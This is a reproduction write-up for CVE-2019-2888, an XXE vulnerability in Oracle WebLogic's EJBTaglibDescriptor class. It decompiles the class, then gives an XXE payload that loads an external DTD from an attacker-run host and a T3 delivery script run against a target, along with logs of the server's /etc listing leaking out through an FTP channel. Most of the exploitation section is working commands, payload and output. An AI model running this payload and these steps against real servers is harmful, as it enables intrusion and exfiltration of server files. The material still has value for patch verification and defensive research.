(CVE-2019-2888) WebLogic EJBTaglibDescriptor XXE vulnerability

1. Vulnerability overview

2. Affected versions

The EJB Container component of WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 has a security vulnerability.

3. Reproduction

Tools and target: fernflower.jar (decompiler) and weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class. First locate the class inside the unpacked weblogic.jar:
╭─root@jas502n /var
╰─# find ./ |grep EJBTaglibDescriptor
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar

Decompile EJBTaglibDescriptor.class into EJBTaglibDescriptor.java:

╭─root@jas502n /var
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
INFO:  Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO:  ... done
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar

View the decompiled source (excerpt):

╭─root@jas502n /var 
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
   private static final long serialVersionUID = -9016538269900747655L;
   private FilesystemInfoDescriptor fileInfo;
   private BeanDescriptor[] beans;
   private transient ClassLoader jarLoader;
   private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

   static void p(String var0) {
      System.err.println("[EJBTagDesc]: " + var0);
   }

Exploitation

Download the Python xxer tool from https://github.com/ianxtianxt/CVE-2019-2888 and start it. It brings up xxer_httpd on port 8989 and xxer_ftpd on port 2121 and serves the external DTD at http://10.10.20.100:8989/ext.dtd:

python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>

Send the serialized XML payload over the T3 protocol:

ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001                                                 


 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/
                          /____/

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n



[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest: ~/Desktop/CVE-2019-2888#

The /etc directory listing comes back in the FTP PASS field of the xxer log:

root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>


10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version